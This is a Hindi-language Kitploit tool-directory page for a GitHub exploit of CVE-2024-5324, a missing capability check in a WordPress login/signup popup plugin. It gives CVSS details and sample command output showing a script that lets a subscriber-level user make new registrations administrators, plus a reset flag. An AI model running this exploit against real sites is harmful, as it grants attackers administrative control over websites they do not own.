Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-5324 — लॉगिन/साइनअप पॉपअप ( इनलाइन फॉर्म + वूकॉमर्स ) 2.7.1 - 2.7.2 - मनमाने विकल्प अपडेट के लिए अनधिकृत पहुंच की कमी | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-5324
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणगलत कॉन्फ़िगरेशन
GitHubrandomrobbiebf/cve-2024-5324

CVE-2024-5324

लॉगिन/साइनअप पॉपअप ( इनलाइन फॉर्म + वूकॉमर्स ) 2.7.1 - 2.7.2 - मनमाने विकल्प अपडेट के लिए अनधिकृत पहुंच की कमी

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-5324

लॉगिन/साइनअप पॉपअप (इनलाइन फॉर्म + वूकॉमर्स) 2.7.1 - 2.7.2 - मनमाने विकल्पों को अद्यतन करने के लिए अनधिकृत प्राधिकरण

विवरण:

वर्डप्रेस के लिए लॉगिन/साइनअप पॉपअप (इनलाइन फॉर्म + वूकॉमर्स) प्लगइन, संस्करण 2.7.1 से 2.7.2 में, 'import_settings' फ़ंक्शन में क्षमता जाँच की कमी के कारण डेटा में अनधिकृत संशोधन के लिए असुरक्षित है। इससे प्रमाणित हमलावरों, जिनके पास सब्सक्राइबर-स्तर या उससे ऊपर की पहुँच है, के लिए प्रभावित साइटों पर मनमाने विकल्प बदलना संभव हो जाता है। इसका उपयोग नए उपयोगकर्ता पंजीकरण को सक्षम करने और नए उपयोगकर्ताओं के लिए डिफ़ॉल्ट भूमिका व्यवस्थापक सेट करने के लिए किया जा सकता है।

root@kitploit:~
 Severity: high
 CVE ID: CVE-2024-5324
 CVSS Score: 8.8
 CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 Plugin Slug: easy-login-woocommerce
 WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
 Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod

उपयोग कैसे करें

root@kitploit:~
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.

$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default
टूल डाउनलोड करें